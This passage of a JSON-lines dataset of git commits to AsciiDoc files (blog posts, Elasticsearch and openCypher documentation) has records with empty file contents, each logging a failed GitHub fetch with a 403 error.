KimTaehee\/elasticsearch,i-am-Nathan\/elasticsearch,a2lin\/elasticsearch,pozhidaevak\/elasticsearch,masterweb121\/elasticsearch,kaneshin\/elasticsearch,F0lha\/elasticsearch,sneivandt\/elasticsearch,pritishppai\/elasticsearch,sc0ttkclark\/elasticsearch,andrestc\/elasticsearch,nknize\/elasticsearch,yynil\/elasticsearch,gmarz\/elasticsearch,maddin2016\/elasticsearch,onegambler\/elasticsearch,mapr\/elasticsearch,djschny\/elasticsearch,Ansh90\/elasticsearch,Shepard1212\/elasticsearch,clintongormley\/elasticsearch,henakamaMSFT\/elasticsearch,jbertouch\/elasticsearch,Helen-Zhao\/elasticsearch,uschindler\/elasticsearch,truemped\/elasticsearch,StefanGor\/elasticsearch,yanjunh\/elasticsearch,huanzhong\/elasticsearch,btiernay\/elasticsearch,rajanm\/elasticsearch,lzo\/elasticsearch-1,PhaedrusTheGreek\/elasticsearch,mapr\/elasticsearch,winstonewert\/elasticsearch,tkssharma\/elasticsearch,infusionsoft\/elasticsearch,Siddartha07\/elasticsearch,vietlq\/elasticsearch,myelin\/elasticsearch,apepper\/elasticsearch,tahaemin\/elasticsearch,sdauletau\/elasticsearch,nomoa\/elasticsearch,apepper\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,mbrukman\/elasticsearch,liweinan0423\/elasticsearch,mcku\/elasticsearch,sc0ttkclark\/elasticsearch,Helen-Zhao\/elasticsearch,jeteve\/elasticsearch,kalimatas\/elasticsearch,kunallimaye\/elasticsearch,StefanGor\/elasticsearch,wimvds\/elasticsearch,mjason3\/elasticsearch,xuzha\/elasticsearch,lzo\/elasticsearch-1,sreeramjayan\/elasticsearch,sreeramjayan\/elasticsearch,nellicus\/elasticsearch,geidies\/elasticsearch,jeteve\/elasticsearch,cnfire\/elasticsearch-1,jpountz\/elasticsearch,hafkensite\/elasticsearch,mgalushka\/elasticsearch,ulkas\/elasticsearch,karthikjaps\/elasticsearch,adrianbk\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,andrejserafim\/elasticsearch,mm0\/elasticsearch,diendt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,yynil\/elasticsearch,karthikjaps\/elasticsearch,ulkas\/elasticsearch,mortonsykes\/elasticsearch,mjason3\/elasticsearch,dpursehouse\/elasticsearch,nellicus\/elasticsearch,iamjakob\/elasticsearch,lks21c\/elasticsearch,jchampion\/elasticsearch,onegambler\/elasticsearch,jango2015\/elasticsearch,Uiho\/elasticsearch,beiske\/elasticsearch,strapdata\/elassandra-test,shreejay\/elasticsearch,rlugojr\/elasticsearch,Collaborne\/elasticsearch,gfyoung\/elasticsearch,rento19962\/elasticsearch,MisterAndersen\/elasticsearch,drewr\/elasticsearch,ivansun1010\/elasticsearch,gingerwizard\/elasticsearch,mmaracic\/elasticsearch,pritishppai\/elasticsearch,wangtuo\/elasticsearch,iacdingping\/elasticsearch,petabytedata\/elasticsearch,18098924759\/elasticsearch,areek\/elasticsearch,queirozfcom\/elasticsearch,slavau\/elasticsearch,YosuaMichael\/elasticsearch,JervyShi\/elasticsearch,glefloch\/elasticsearch,liweinan0423\/elasticsearch,liweinan0423\/elasticsearch,davidvgalbraith\/elasticsearch,kalburgimanjunath\/elasticsearch,MaineC\/elasticsearch,YosuaMichael\/elasticsearch,pritishppai\/elasticsearch,obourgain\/elasticsearch,tkssharma\/elasticsearch,mmaracic\/elasticsearch,fernandozhu\/elasticsearch,sposam\/elasticsearch,uschindler\/elasticsearch,MichaelLiZhou\/elasticsearch,tkssharma\/elasticsearch,cnfire\/elasticsearch-1,avikurapati\/elasticsearch,weipinghe\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,infusionsoft\/elasticsearch,lydonchandra\/elasticsearch,GlenRSmith\/elasticsearch,kaneshin\/elasticsearch,F0lha\/elasticsearch,iamjakob\/elasticsearch,hydro2k\/elasticsearch,glefloch\/elasticsearch,Charlesdong\/elasticsearch,nilabhsagar\/elasticsearch,ivansun1010\/elasticsearch,nellicus\/elasticsearch,sc0ttkclark\/elasticsearch,Collaborne\/elasticsearch,wuranbo\/elasticsearch,mohit\/elasticsearch,MichaelLiZhou\/elasticsearch,rhoml\/elasticsearch,Collaborne\/elasticsearch,infusionsoft\/elasticsearch,btiernay\/elasticsearch,rajanm\/elasticsearch,pablocastro\/elasticsearch,tebriel\/elasticsearch,iacdingping\/elasticsearch,YosuaMichael\/elasticsearch,huanzhong\/elasticsearch,episerver\/elasticsearch,glefloch\/elasticsearch,Collaborne\/elasticsearch,cwurm\/elasticsearch,GlenRSmith\/elasticsearch,kingaj\/elasticsearch,hafkensite\/elasticsearch,yongminxia\/elasticsearch,wittyameta\/elasticsearch,LeoYao\/elasticsearch,gmarz\/elasticsearch,a2lin\/elasticsearch,elancom\/elasticsearch,kalburgimanjunath\/elasticsearch,mohit\/elasticsearch,polyfractal\/elasticsearch,cnfire\/elasticsearch-1,Uiho\/elasticsearch,rento19962\/elasticsearch,vroyer\/elasticassandra,sposam\/elasticsearch,pablocastro\/elasticsearch,huanzhong\/elasticsearch,drewr\/elasticsearch,xingguang2013\/elasticsearch,elasticdog\/elasticsearch,pranavraman\/elasticsearch,dongjoon-hyun\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mgalushka\/elasticsearch,fforbeck\/elasticsearch,lmtwga\/elasticsearch,bawse\/elasticsearch,MichaelLiZhou\/elasticsearch,geidies\/elasticsearch,karthikjaps\/elasticsearch,strapdata\/elassandra5-rc,lydonchandra\/elasticsearch,martinstuga\/elasticsearch,jango2015\/elasticsearch,JSCooke\/elasticsearch,ricardocerq\/elasticsearch,sdauletau\/elasticsearch,martinstuga\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra,hydro2k\/elasticsearch,brandonkearby\/elasticsearch,ckclark\/elasticsearch,a2lin\/elasticsearch,himanshuag\/elasticsearch,Shepard1212\/elasticsearch,pranavraman\/elasticsearch,elancom\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,MetSystem\/elasticsearch,cwurm\/elasticsearch,kingaj\/elasticsearch,myelin\/elasticsearch,Charlesdong\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,AndreKR\/elasticsearch,clintongormley\/elasticsearch,kunallimaye\/elasticsearch,F0lha\/elasticsearch,ImpressTV\/elasticsearch,StefanGor\/elasticsearch,polyfractal\/elasticsearch,jimczi\/elasticsearch,caengcjd\/elasticsearch,ESamir\/elasticsearch,Shepard1212\/elasticsearch,Shepard1212\/elasticsearch,sc0ttkclark\/elasticsearch,mnylen\/elasticsearch,xuzha\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,onegambler\/elasticsearch,wimvds\/elasticsearch,pranavraman\/elasticsearch,shreejay\/elasticsearch,sc0ttkclark\/elasticsearch,zkidkid\/elasticsearch,queirozfcom\/elasticsearch,schonfeld\/elasticsearch,strapdata\/elassandra5-rc,JackyMai\/elasticsearch,i-am-Nathan\/elasticsearch,lydonchandra\/elasticsearch,nknize\/elasticsearch,schonfeld\/elasticsearch,sposam\/elasticsearch,jprante\/elasticsearch,HonzaKral\/elasticsearch,springning\/elasticsearch,StefanGor\/elasticsearch,ulkas\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,mnylen\/elasticsearch,sdauletau\/elasticsearch,huanzhong\/elasticsearch,jango2015\/elasticsearch,F0lha\/elasticsearch,clintongormley\/elasticsearch,vietlq\/elasticsearch,yynil\/elasticsearch,jimczi\/elasticsearch,masterweb121\/elasticsearch,infusionsoft\/elasticsearch,cwurm\/elasticsearch,lzo\/elasticsearch-1,achow\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,snikch\/elasticsearch,nknize\/elasticsearch,YosuaMichael\/elasticsearch,mohit\/elasticsearch,ricardocerq\/elasticsearch,adrianbk\/elasticsearch,IanvsPoplicola\/elasticsearch,elancom\/elasticsearch,yanjunh\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,avikurapati\/elasticsearch,ckclark\/elasticsearch,mikemccand\/elasticsearch,myelin\/elasticsearch,mjason3\/elasticsearch,schonfeld\/elasticsearch,kalimatas\/elasticsearch,snikch\/elasticsearch,scorpionvicky\/elasticsearch,mm0\/elasticsearch,drewr\/elasticsearch,hydro2k\/elasticsearch,pozhidaevak\/elasticsearch,zhiqinghuang\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra-test,truemped\/elasticsearch,beiske\/elasticsearch,robin13\/elasticsearch,infusionsoft\/elasticsearch,strapdata\/elassandra5-rc,awislowski\/elasticsearch,jprante\/elasticsearch,elasticdog\/elasticsearch,Ansh90\/elasticsearch,Uiho\/elasticsearch,weipinghe\/elasticsearch,apepper\/elasticsearch,episerver\/elasticsearch,mbrukman\/elasticsearch,vietlq\/elasticsearch,apepper\/elasticsearch,schonfeld\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,jprante\/elasticsearch,rmuir\/elasticsearch,nellicus\/elasticsearch,sreeramjayan\/elasticsearch,tahaemin\/elasticsearch,weipinghe\/elasticsearch,Brijeshrpatel9\/elasticsearch,martinstuga\/elasticsearch,springning\/elasticsearch,pablocastro\/elasticsearch,wbowling\/elasticsearch,jpountz\/elasticsearch,jango2015\/elasticsearch,JackyMai\/elasticsearch,iamjakob\/elasticsearch,camilojd\/elasticsearch,masaruh\/elasticsearch,diendt\/elasticsearch,wenpos\/elasticsearch,bestwpw\/elasticsearch,shreejay\/elasticsearch,jchampion\/elasticsearch,girirajsharma\/elasticsearch,nomoa\/elasticsearch,Brijeshrpatel9\/elasticsearch,kunallimaye\/elasticsearch,onegambler\/elasticsearch,lydonchandra\/elasticsearch,sposam\/elasticsearch,ouyangkongtong\/elasticsearch,hafkensite\/elasticsearch,nomoa\/elasticsearch,strapdata\/elassandra-test,ouyangkongtong\/elasticsearch,artnowo\/elasticsearch,fred84\/elasticsearch,pranavraman\/elasticsearch,pritishppai\/elasticsearch,s1monw\/elasticsearch,mcku\/elasticsearch,Ansh90\/elasticsearch,KimTaehee\/elasticsearch,markwalkom\/elasticsearch,ESamir\/elasticsearch,robin13\/elasticsearch,jprante\/elasticsearch,njlawton\/elasticsearch,JSCooke\/elasticsearch,djschny\/elasticsearch,mm0\/elasticsearch,kunallimaye\/elasticsearch,AndreKR\/elasticsearch,btiernay\/elasticsearch,markwalkom\/elasticsearch,truemped\/elasticsearch,Uiho\/elasticsearch,qwerty4030\/elasticsearch,MichaelLiZhou\/elasticsearch,MetSystem\/elasticsearch,camilojd\/elasticsearch,qwerty4030\/elasticsearch,AndreKR\/elasticsearch,palecur\/elasticsearch,mgalushka\/elasticsearch,Rygbee\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,achow\/elasticsearch,liweinan0423\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra5-rc,wbowling\/elasticsearch,cnfire\/elasticsearch-1,mmaracic\/elasticsearch,nellicus\/elasticsearch,masterweb121\/elasticsearch,sc0ttkclark\/elasticsearch,davidvgalbraith\/elasticsearch,Uiho\/elasticsearch,franklanganke\/elasticsearch,tebriel\/elasticsearch,18098924759\/elasticsearch,avikurapati\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mbrukman\/elasticsearch,hydro2k\/elasticsearch,franklanganke\/elasticsearch,Siddartha07\/elasticsearch,slavau\/elasticsearch,MaineC\/elasticsearch,onegambler\/elasticsearch,iacdingping\/elasticsearch,davidvgalbraith\/elasticsearch,camilojd\/elasticsearch,maddin2016\/elasticsearch,apepper\/elasticsearch,adrianbk\/elasticsearch,MetSystem\/elasticsearch,jango2015\/elasticsearch,masterweb121\/elasticsearch,mmaracic\/elasticsearch,ImpressTV\/elasticsearch,nrkkalyan\/elasticsearch,trangvh\/elasticsearch,andrestc\/elasticsearch,naveenhooda2000\/elasticsearch,cnfire\/elasticsearch-1,baishuo\/elasticsearch_v2.1.0-baishuo,MisterAndersen\/elasticsearch,scottsom\/elasticsearch,spiegela\/elasticsearch,ESamir\/elasticsearch,kalburgimanjunath\/elasticsearch,rmuir\/elasticsearch,achow\/elasticsearch,iamjakob\/elasticsearch,mortonsykes\/elasticsearch,awislowski\/elasticsearch,MetSystem\/elasticsearch,jprante\/elasticsearch,jbertouch\/elasticsearch,truemped\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,bestwpw\/elasticsearch,mjason3\/elasticsearch,mgalushka\/elasticsearch,diendt\/elasticsearch,Brijeshrpatel9\/elasticsearch,zhiqinghuang\/elasticsearch,adrianbk\/elasticsearch,MjAbuz\/elasticsearch,areek\/elasticsearch,jpountz\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch,tahaemin\/elasticsearch,wuranbo\/elasticsearch,qwerty4030\/elasticsearch,wittyameta\/elasticsearch,socialrank\/elasticsearch,ESamir\/elasticsearch,kunallimaye\/elasticsearch,iamjakob\/elasticsearch,markharwood\/elasticsearch,knight1128\/elasticsearch,vietlq\/elasticsearch,jeteve\/elasticsearch,slavau\/elasticsearch,karthikjaps\/elasticsearch,gingerwizard\/elasticsearch,adrianbk\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,rhoml\/elasticsearch,gmarz\/elasticsearch,yynil\/elasticsearch,truemped\/elasticsearch,caengcjd\/elasticsearch,lydonchandra\/elasticsearch,rmuir\/elasticsearch,mikemccand\/elasticsearch,hafkensite\/elasticsearch,karthikjaps\/elasticsearch,hafkensite\/elasticsearch,himanshuag\/elasticsearch,tahaemin\/elasticsearch,petabytedata\/elasticsearch,weipinghe\/elasticsearch,btiernay\/elasticsearch,kunallimaye\/elasticsearch,areek\/elasticsearch,xuzha\/elasticsearch,tebriel\/elasticsearch,fforbeck\/elasticsearch,btiernay\/elasticsearch,C-Bish\/elasticsearch,pranavraman\/elasticsearch,MisterAndersen\/elasticsearch,Helen-Zhao\/elasticsearch,palecur\/elasticsearch,polyfractal\/elasticsearch,ImpressTV\/elasticsearch,glefloch\/elasticsearch,gfyoung\/elasticsearch,lmtwga\/elasticsearch,schonfeld\/elasticsearch,njlawton\/elasticsearch,girirajsharma\/elasticsearch,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,cwurm\/elasticsearch,tkssharma\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,mnylen\/elasticsearch,mapr\/elasticsearch,andrejserafim\/elasticsearch,himanshuag\/elasticsearch,dongjoon-hyun\/elasticsearch,masterweb121\/elasticsearch,jpountz\/elasticsearch,fernandozhu\/elasticsearch,djschny\/elasticsearch,strapdata\/elassandra-test,Collaborne\/elasticsearch,lzo\/elasticsearch-1,clintongormley\/elasticsearch,sdauletau\/elasticsearch,pranavraman\/elasticsearch,dpursehouse\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,andrejserafim\/elasticsearch,nezirus\/elasticsearch,alexshadow007\/elasticsearch,weipinghe\/elasticsearch,mcku\/elasticsearch,areek\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,wimvds\/elasticsearch,nknize\/elasticsearch,mm0\/elasticsearch,yanjunh\/elasticsearch,umeshdangat\/elasticsearch,ivansun1010\/elasticsearch,mbrukman\/elasticsearch,springning\/elasticsearch,iamjakob\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,geidies\/elasticsearch,yynil\/elasticsearch,zkidkid\/elasticsearch,petabytedata\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,franklanganke\/elasticsearch,kaneshin\/elasticsearch,KimTaehee\/elasticsearch,vietlq\/elasticsearch,petabytedata\/elasticsearch,wenpos\/elasticsearch,palecur\/elasticsearch,Charlesdong\/elasticsearch,ckclark\/elasticsearch,JervyShi\/elasticsearch,nrkkalyan\/elasticsearch,vroyer\/elassandra,queirozfcom\/elasticsearch,ulkas\/elasticsearch,andrejserafim\/elasticsearch,JervyShi\/elasticsearch,lmtwga\/elasticsearch,Brijeshrpatel9\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,ulkas\/elasticsearch,xuzha\/elasticsearch,mikemccand\/elasticsearch,caengcjd\/elasticsearch,drewr\/elasticsearch,himanshuag\/elasticsearch,drewr\/elasticsearch,masaruh\/elasticsearch,mm0\/elasticsearch,F0lha\/elasticsearch,socialrank\/elasticsearch,Charlesdong\/elasticsearch,girirajsharma\/elasticsearch,socialrank\/elasticsearch,clintongormley\/elasticsearch,dpursehouse\/elasticsearch,clintongormley\/elasticsearch,ZTE-PaaS\/elasticsearch,xuzha\/elasticsearch,scorpionvicky\/elasticsearch,sdauletau\/elasticsearch,pranavraman\/elasticsearch,strapdata\/elassandra,myelin\/elasticsearch,nrkkalyan\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,polyfractal\/elasticsearch,socialrank\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,ricardocerq\/elasticsearch,LewayneNaidoo\/elasticsearch,cnfire\/elasticsearch-1,sreeramjayan\/elasticsearch,masaruh\/elasticsearch,obourgain\/elasticsearch,ImpressTV\/elasticsearch,andrestc\/elasticsearch,alexshadow007\/elasticsearch,nilabhsagar\/elasticsearch,KimTaehee\/elasticsearch,wangtuo\/elasticsearch,yongminxia\/elasticsearch,mbrukman\/elasticsearch,brandonkearby\/elasticsearch,areek\/elasticsearch,kingaj\/elasticsearch,infusionsoft\/elasticsearch,knight1128\/elasticsearch,sneivandt\/elasticsearch,kingaj\/elasticsearch,myelin\/elasticsearch,jchampion\/elasticsearch,jimczi\/elasticsearch,ivansun1010\/elasticsearch,franklanganke\/elasticsearch,iacdingping\/elasticsearch,socialrank\/elasticsearch,MisterAndersen\/elasticsearch,achow\/elasticsearch,karthikjaps\/elasticsearch,diendt\/elasticsearch,sneivandt\/elasticsearch,awislowski\/elasticsearch,kalburgimanjunath\/elasticsearch,Rygbee\/elasticsearch,PhaedrusTheGreek\/elasticsearch,MjAbuz\/elasticsearch,polyfractal\/elasticsearch,gingerwizard\/elasticsearch,franklanganke\/elasticsearch,markharwood\/elasticsearch,tkssharma\/elasticsearch,ImpressTV\/elasticsearch,ESamir\/elasticsearch,dongjoon-hyun\/elasticsearch,trangvh\/elasticsearch,wbowling\/elasticsearch,rento19962\/elasticsearch,18098924759\/elasticsearch,beiske\/elasticsearch,elancom\/elasticsearch,lzo\/elasticsearch-1,weipinghe\/elasticsearch","old_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc1491d3a740b0acee4e84633a6bc339b4c96327","subject":"y2b create post MAG 2 Gun Controller for XBOX 360, PS3 \\u0026 PC (CES 2013)","message":"y2b create post MAG 2 Gun Controller for XBOX 360, PS3 \\u0026 PC (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-12-MAG-2-Gun-Controller-for-XBOX-360-PS3-u0026-PC-CES-2013.adoc","new_file":"_posts\/2013-01-12-MAG-2-Gun-Controller-for-XBOX-360-PS3-u0026-PC-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d92f30bd51bdd7cefe898e3b17d45d01c7c57f71","subject":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","message":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d7f041892b106c3555dd43f1ad12072005aa33d","subject":"Added a missing README for metrics","message":"Added a missing README for metrics\n","repos":"vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples","old_file":"metrics-examples\/README.adoc","new_file":"metrics-examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"187ff6c048f2ecb71936596534a773cd6dba16ed","subject":"Update 2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","message":"Update 2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","repos":"Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","new_file":"_posts\/2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Desarrollo-FullStack\/Desarrollo-FullStack.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b748a1815206b1320e971eb8322b2ffbfa3ff492","subject":"Importing CIP2014-03-12","message":"Importing CIP2014-03-12\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2014-03-12-require-connected-patterns.asciidoc","new_file":"cip\/CIP2014-03-12-require-connected-patterns.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c01273c522c07aeab6ce41008ce0530ba4962a76","subject":"Update 2015-12-05-ssh-S-F-T-P.adoc","message":"Update 2015-12-05-ssh-S-F-T-P.adoc","repos":"MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io","old_file":"_posts\/2015-12-05-ssh-S-F-T-P.adoc","new_file":"_posts\/2015-12-05-ssh-S-F-T-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MichaelIT\/MichaelIT.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94bf33049eef4fcc6a50e565882cc05270c74823","subject":"Update 2015-02-20-Hi.adoc","message":"Update 2015-02-20-Hi.adoc","repos":"ron194\/ron194.github.io,ron194\/ron194.github.io,ron194\/ron194.github.io","old_file":"_posts\/2015-02-20-Hi.adoc","new_file":"_posts\/2015-02-20-Hi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ron194\/ron194.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0033f1f4f3e33512615cc18580d84ce3cb5c0ef0","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfd3c5cb66bcc7b4058b6afabf304f8715c877be","subject":"Update 2016-09-innovation-engineer-aruaru.adoc","message":"Update 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf1936175153619c537eb8d8bd746bac808fa261","subject":"Update 2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","message":"Update 2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","new_file":"_posts\/2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d98906a4d7440aefb3f576ef63b35e0fd2116534","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65c31f892b4c17e8981d51f583a3064d5460dc3c","subject":"spelling","message":"spelling","repos":"ePages-de\/rnd-microservices-handson,ePages-de\/rnd-microservices-handson,ePages-de\/rnd-microservices-handson,ePages-de\/rnd-microservices-handson","old_file":"catalog\/src\/docs\/asciidoc\/resources\/pizza.adoc","new_file":"catalog\/src\/docs\/asciidoc\/resources\/pizza.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ePages-de\/rnd-microservices-handson.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94a8c7d57ca96f4915ff88e9e2e24bea36f86596","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"149418c142c27f4d3a91d7a61b93fbff5c927af8","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00cd5c99684a279fd5588b90e8bd45ac6a6eec5c","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9ed787531851f6d841a2b458c17e0180141638c","subject":"Improve text for integrating with Cloudera Manager","message":"Improve text for integrating with Cloudera Manager\n\nChange-Id: 